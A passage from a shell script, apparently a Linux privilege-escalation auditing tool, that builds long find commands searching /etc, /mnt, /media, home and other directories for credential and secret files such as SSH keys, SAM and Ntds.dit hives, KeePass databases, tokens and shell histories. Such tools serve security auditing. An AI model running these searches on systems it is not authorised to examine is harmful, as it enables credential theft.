-name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"exports\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"*knockd*\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \"ssh*config\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"log4j-core*.jar\" -o -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" -o -name \"rocketchat.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"log4j-core*.jar\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"log4j-core*.jar\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"sess_*\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" 